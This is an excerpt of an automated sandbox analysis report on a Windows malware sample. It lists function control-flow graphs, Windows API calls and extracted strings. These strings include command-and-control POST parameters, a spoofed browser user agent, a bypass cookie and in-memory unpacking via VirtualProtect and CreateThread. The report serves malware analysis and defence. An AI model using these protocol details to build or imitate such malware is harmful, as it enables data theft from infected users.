                                                                                                                                                                                                                                                                                                                                  • act=recive_message&lid=%s&j=%s&ver=4.0, xrefs: 00614A6C
                                                                                                                                                                                                                                                                                                                                  • /api, xrefs: 006149FA
                                                                                                                                                                                                                                                                                                                                  • POST, xrefs: 006149F4
                                                                                                                                                                                                                                                                                                                                  • NmLpQW--spam2, xrefs: 00614A72
                                                                                                                                                                                                                                                                                                                                  • Content-Type: application/x-www-form-urlencoded, xrefs: 00614A3A
                                                                                                                                                                                                                                                                                                                                  • Cookie: __cf_mw_byp=%hs, xrefs: 00614AC4
                                                                                                                                                                                                                                                                                                                                  • P, xrefs: 006149CA
                                                                                                                                                                                                                                                                                                                                  • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36, xrefs: 00614978
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2119111432.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119037784.00000000005C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119244600.0000000000630000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119302748.000000000063A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119360707.0000000000640000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_5c0000_B43A.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Http$CloseHandleRequest_strlen$DataOpen$AvailableConnectHeadersQueryReadReceiveResponseSendwsprintf
                                                                                                                                                                                                                                                                                                                                  • String ID: /api$7d98652ded8515eb4124c533a671c7aa$Content-Type: application/x-www-form-urlencoded$Cookie: __cf_mw_byp=%hs$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36$NmLpQW--spam2$P$POST$act=recive_message&lid=%s&j=%s&ver=4.0
                                                                                                                                                                                                                                                                                                                                  • API String ID: 471639143-2248134418
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 2dfbdc64c978daf3845791d2b8d4e0b3e08b9b589d485fb23494d94cca73d48a
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 2b9eea341c5d00a7f38f1eaa1ba72d6bd14eaacdba12fa0e5995cfe55d98588f
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2dfbdc64c978daf3845791d2b8d4e0b3e08b9b589d485fb23494d94cca73d48a
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1FD1CFB040D301DFD704DF68D19879ABBE2BF88708F14892EF49987290DB799589CF86
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                  control_flow_graph 70 5f6830-5f6967 call 6187c0 call 61dc70 call 61d76f WinHttpOpen 78 5f696b-5f699a WinHttpConnect 70->78 79 5f6969 70->79 80 5f699d-5f69b4 78->80 79->80 82 5f69b8-5f6a08 WinHttpOpenRequest 80->82 83 5f69b6 80->83 84 5f6a0a-5f6a1d 82->84 83->84 85 5f6a1f 84->85 86 5f6a21-5f6a6a WinHttpSendRequest 84->86 87 5f6a6c-5f6a6f 85->87 86->87 88 5f6a8e-5f6a97 87->88 89 5f6a71-5f6a8c WinHttpReceiveResponse 87->89 90 5f6a9d 88->90 91 5f6b78-5f6b7e 88->91 89->88 92 5f6aa3-5f6aba WinHttpQueryDataAvailable 90->92 93 5f6b97-5f6bb5 call 61db80 91->93 94 5f6b80-5f6b92 91->94 95 5f6abc-5f6abf 92->95 96 5f6ac2-5f6ac8 92->96 104 5f6bce-5f6bf5 call 618a50 93->104 105 5f6bb7-5f6bc9 93->105 97 5f6cca-5f6cd3 94->97 95->96 99 5f6acf-5f6b05 call 61da6f 96->99 100 5f6aca 96->100 108 5f6b07-5f6b10 99->108 109 5f6b12-5f6b54 WinHttpReadData 99->109 102 5f6b6d-5f6b74 100->102 102->91 115 5f6bf9-5f6c2a call 5f66e0 104->115 116 5f6bf7-5f6c68 104->116 105->97 111 5f6b5a-5f6b5e 108->111 109->111 113 5f6b64-5f6b68 111->113 114 5f6b60-5f6b62 111->114 113->92 114->102 125 5f6c2c-5f6c3e 115->125 126 5f6c40-5f6c5d 115->126 123 5f6c6a-5f6c72 WinHttpCloseHandle 116->123 124 5f6c78-5f6c85 116->124 123->124 129 5f6c89-5f6c9c WinHttpCloseHandle 124->129 130 5f6c87 124->130 128 5f6c63 125->128 126->128 128->97 132 5f6c9e-5f6ca4 129->132 130->132 133 5f6ca6-5f6cae WinHttpCloseHandle 132->133 134 5f6cb4-5f6cc8 132->134 133->134 134->97
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  • /api, xrefs: 005F69C3
                                                                                                                                                                                                                                                                                                                                  • POST, xrefs: 005F69BD
                                                                                                                                                                                                                                                                                                                                  • Content-Type: application/x-www-form-urlencoded, xrefs: 005F6A0A
                                                                                                                                                                                                                                                                                                                                  • name="atok" value=", xrefs: 005F6BFE
                                                                                                                                                                                                                                                                                                                                  • act=life, xrefs: 005F6A25
                                                                                                                                                                                                                                                                                                                                  • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36, xrefs: 005F6924
                                                                                                                                                                                                                                                                                                                                  • P, xrefs: 005F697F
                                                                                                                                                                                                                                                                                                                                  • section, xrefs: 005F6BD5
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2119111432.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119037784.00000000005C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119244600.0000000000630000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119302748.000000000063A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119360707.0000000000640000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_5c0000_B43A.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Http$CloseHandle$DataOpenRequest$AvailableConnectQueryReadReceiveResponseSend_strlen
                                                                                                                                                                                                                                                                                                                                  • String ID: /api$Content-Type: application/x-www-form-urlencoded$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36$P$POST$act=life$name="atok" value="$section
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1263869446-691063197
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: b978ba637741f1ea43eb3c449fa04416bb144ceea1a565a67120a79a1f13ac35
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: cdd5d1d1751b4b0cf444ec8e7ff3603b32b7edc198870b89c2d50af3a8be6fa2
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b978ba637741f1ea43eb3c449fa04416bb144ceea1a565a67120a79a1f13ac35
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5BF1E0B4904309DFDB04DFA8D9947AEBBF1FB49304F108869E585AB390D7799844CFA2
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                  control_flow_graph 214 404043-404052 215 404054-404060 214->215 216 40407b 214->216 215->216 217 404062-404069 215->217 218 40407f-404089 call 4054f9 216->218 217->216 219 40406b-404079 217->219 222 404093-40409a call 40536c 218->222 223 40408b-404092 call 404000 218->223 219->218 228 4040a4-4040b4 call 404f10 call 404cbc 222->228 229 40409c-4040a3 call 404000 222->229 223->222 236 4040b6-4040bd call 404205 228->236 237 4040be-4040da GetCommandLineA call 404b85 call 404aca 228->237 229->228 236->237 244 4040e4-4040eb call 404852 237->244 245 4040dc-4040e3 call 404205 237->245 250 4040f5-4040ff call 4042c4 244->250 251 4040ed-4040f4 call 404205 244->251 245->244 256 404101-404107 call 404205 250->256 257 404108-40411f call 403520 250->257 251->250 256->257 261 404124-40412e 257->261 262 404130-404131 call 404475 261->262 263 404136-40417a call 4044a1 call 405571 261->263 262->263
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2118092287.0000000000403000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2117929397.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2118008646.0000000000401000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2118217497.000000000040B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2118288328.000000000040D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2118781005.0000000000494000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_B43A.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: __amsg_exit$_fast_error_exit$CommandEnvironmentInitializeLineStrings___crt__cinit__ioinit__mtinit__setargv__setenvp
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2598563909-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 3a50c033d0817a782db3f537ac6fd47be41e72daf0dc5681ca2b48a484e73b16
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 1aee07c1eed1afa6a85fb6a1b62d1c035e517e5607a133d89d050e6aebae3dc3
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3a50c033d0817a782db3f537ac6fd47be41e72daf0dc5681ca2b48a484e73b16
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D12167F1D00605AADB20BB72A906B6A32A46FD031DF10447FF715795D2DF7C89818A5D
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(0040B140,000000D4), ref: 00402EE3
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00402EEA
                                                                                                                                                                                                                                                                                                                                  • VirtualProtect.KERNELBASE(Function_00001450,00001900,00000040,?), ref: 00402F9B
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2118008646.0000000000401000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2117929397.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2118092287.0000000000403000.00000020.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2118217497.000000000040B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2118288328.000000000040D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2118781005.0000000000494000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_B43A.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                                                                                                                                                                                                                                  • String ID: 6$C$H$H$N$R
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2099061454-3578717724
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: fd9408ab7e5d00f357830bdb5bdd11dcfff663c253408a74d7f7ff3ebabf69c4
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 83caa69867e536e1afae75cfb5f57e71f80edaa2be2ef67d7f05577c5a11efcb
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fd9408ab7e5d00f357830bdb5bdd11dcfff663c253408a74d7f7ff3ebabf69c4
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 48716065C082DC8DDB02C7FD8956AEDFFF04F6F281F084299D9E5B62D2C1A80A448B75
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2119111432.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119037784.00000000005C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119244600.0000000000630000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119302748.000000000063A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119360707.0000000000640000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_5c0000_B43A.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: ExitProcess
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 621844428-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: c6e9d072bc94cc81a46d30e38bd1a60a1a825fadca0ebfcc01de6373dc5be65d
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 10dfac3f36046675d799e24866340ff0ff3327dc2d2e1163543ae508eec7400f
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c6e9d072bc94cc81a46d30e38bd1a60a1a825fadca0ebfcc01de6373dc5be65d
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D851D0B04083419FD740EF68C588B5EBBE0BB88318F50892DF4D997291DB79D6898F87
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                  control_flow_graph 309 4020e5-402104 311 402210-40296c GetPEB 309->311 312 40210a-402139 309->312 313 4029ad-402b5c CreateThread 311->313 314 40296e-4029aa call 401430 lstrlenW 311->314 315 402162-40216e 312->315 316 40213b-402147 312->316 321 402b7e-402d41 WaitForSingleObject 313->321 322 402b5e-402b7b Sleep call 401430 313->322 314->313 317 402170-40217c 315->317 318 40218a-402195 315->318 316->315 320 402149-402154 316->320 317->318 323 40217e-402188 317->323 325 4021b1-4021bd 318->325 326 402197-4021a3 318->326 320->315 328 402156-402160 320->328 322->321 331 4021c9-40220b VirtualProtect 323->331 325->331 333 4021bf 325->333 326->325 332 4021a5-4021af 326->332 328->331 332->331 333->331
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • VirtualProtect.KERNELBASE(?,MZx,00000040,?), ref: 00402205
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2118008646.0000000000401000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2117929397.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2118092287.0000000000403000.00000020.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2118217497.000000000040B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2118288328.000000000040D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2118781005.0000000000494000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_B43A.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                                                  • String ID: @$MZx
                                                                                                                                                                                                                                                                                                                                  • API String ID: 544645111-3611936126
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 95af83f2104aaaa3da76ef83d43a014a92a98a406460eb6e6768d5ac93c87a07
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 30c59e40e861a183148405b154a3570424c34177c9d916102ee33d374d203d4a
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 95af83f2104aaaa3da76ef83d43a014a92a98a406460eb6e6768d5ac93c87a07
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C211B971A14128CBDB68CB14CED4BE9F7B2BB64304F1481D9968DBB285C6B85EC0CF54
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                  control_flow_graph 334 622a2b-622a30 335 622a32-622a4a 334->335 336 622a58-622a61 335->336 337 622a4c-622a50 335->337 339 622a73 336->339 340 622a63-622a66 336->340 337->336 338 622a52-622a56 337->338 341 622ad1-622ad5 338->341 344 622a75-622a82 GetStdHandle 339->344 342 622a68-622a6d 340->342 343 622a6f-622a71 340->343 341->335 345 622adb-622ade 341->345 342->344 343->344 346 622a91 344->346 347 622a84-622a86 344->347 349 622a93-622a95 346->349 347->346 348 622a88-622a8f GetFileType 347->348 348->349 350 622ab3-622ac5 349->350 351 622a97-622aa0 349->351 350->341 352 622ac7-622aca 350->352 353 622aa2-622aa6 351->353 354 622aa8-622aab 351->354 352->341 353->341 354->341 355 622aad-622ab1 354->355 355->341
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,00000000,0062291A,00638EA0,0000000C), ref: 00622A77
                                                                                                                                                                                                                                                                                                                                  • GetFileType.KERNELBASE(00000000,?,?,?,?,?,?,?,00000000,0062291A,00638EA0,0000000C), ref: 00622A89
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2119111432.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119037784.00000000005C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119244600.0000000000630000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119302748.000000000063A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119360707.0000000000640000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_5c0000_B43A.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: FileHandleType
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3000768030-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: e86adc857bf5f986f437ca8120ddd90a36e4889c6ad72c02dad7f598b8ab7c27
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: d7d9f800938d2fc2b81fab97d3931c0bba08321c7b04b669ef7f9d4c7fdf256c
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e86adc857bf5f986f437ca8120ddd90a36e4889c6ad72c02dad7f598b8ab7c27
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 74119A31504F636AC7308A3EACA86627A97A756330B340719D8B6C7BF1D730D986DE81
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                  control_flow_graph 374 625381-62538e call 625515 376 625393-62539e 374->376 377 6253a0-6253a2 376->377 378 6253a4-6253ac 376->378 379 6253ef-6253fb call 6232e2 377->379 378->379 380 6253ae-6253b2 378->380 381 6253b4-6253e9 call 621fd3 380->381 386 6253eb-6253ee 381->386 386->379
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00625515: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00622541,00000001,00000364,00000007,000000FF,?,?,?,0061C29E,00623AC2), ref: 00625556
                                                                                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 006253F0
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2119111432.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119037784.00000000005C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119244600.0000000000630000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119302748.000000000063A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119360707.0000000000640000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_5c0000_B43A.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: AllocateHeap_free
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 614378929-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: ed3bd34655073e7c18eb9f1d0365a39b0480a86c0ef29cbef0eecd8aa98e35c3
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: dbab2086893eb6cd46ddf2ed8b455b5e55f870bba736540ef617e797981d467a
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ed3bd34655073e7c18eb9f1d0365a39b0480a86c0ef29cbef0eecd8aa98e35c3
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 74012672604B266BC730CF68D8819DAFBD9EB053B0F14422DE556A76C0E3B0AD10CFA4
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                  control_flow_graph 387 625515-625520 388 625522-62552c 387->388 389 62552e-625534 387->389 388->389 390 625562-62556d call 61c299 388->390 391 625536-625537 389->391 392 62554d-62555e RtlAllocateHeap 389->392 397 62556f-625571 390->397 391->392 393 625560 392->393 394 625539-625540 call 61d1a4 392->394 393->397 394->390 400 625542-62554b call 6235a5 394->400 400->390 400->392
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00622541,00000001,00000364,00000007,000000FF,?,?,?,0061C29E,00623AC2), ref: 00625556
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2119111432.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119037784.00000000005C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119244600.0000000000630000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119302748.000000000063A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119360707.0000000000640000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_5c0000_B43A.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: d3d7d06ab60fced2b077e72b689e6a7fea70c054d94cad3e41e9acf71bebf61e
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 7e20085349fb17aea32f62ef04ad3b7afed8812758d0b81270e870ac3ebb6041
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d3d7d06ab60fced2b077e72b689e6a7fea70c054d94cad3e41e9acf71bebf61e
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0DF0B431645F75ABEB31AE66BC05ADA375BAF40770B188015B80BB6290CB30DD014EE0
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                  • Not Executed
